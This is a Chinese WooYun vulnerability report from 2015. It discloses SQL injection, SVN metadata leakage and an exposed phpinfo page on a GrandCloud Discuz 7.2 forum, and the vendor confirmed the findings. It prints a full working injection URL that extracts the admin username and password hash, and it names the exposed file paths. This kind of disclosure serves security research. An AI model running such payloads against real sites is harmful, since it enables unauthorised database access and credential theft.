当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138535

漏洞标题:盛大云计算某站存在SQL注入与SVN代码泄露漏洞

相关厂商:盛大网络

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-02 11:11

修复时间:2015-10-17 15:38

公开时间:2015-10-17 15:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-02: 厂商已经确认,细节仅向厂商公开
2015-09-12: 细节向核心白帽子及相关领域专家公开
2015-09-22: 细节向普通白帽子公开
2015-10-02: 细节向实习白帽子公开
2015-10-17: 细节向公众公开

简要描述:

2333

详细说明:

论坛地址:http://pre-forum.grandcloud.cn/
看了下版本是dz7.2,尝试了下注入和UCKEY拿SHELL,可以成功爆出管理员账户密码
exp:

http://pre-forum.grandcloud.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x27,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


注入.png

可以看出爆出管理员账号密码,但是UCKEY报不出来因此不能直接拿SHELL
2.SVN泄露
http://pre-forum.grandcloud.cn/templates/grandcloud/.svn/entries

SVN1.png


SVN2.png


3.phpinfo
http://pre-forum.grandcloud.cn/test.php

phpinfo.png

漏洞证明:

已证明

修复方案:

你懂的。。

版权声明:转载请注明来源 Xmyth_夏洛克@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-02 15:36

厂商回复:

已经通知相关人员处理。。。感谢提交。等我有钱了,我给你个特斯拉。

最新状态:

暂无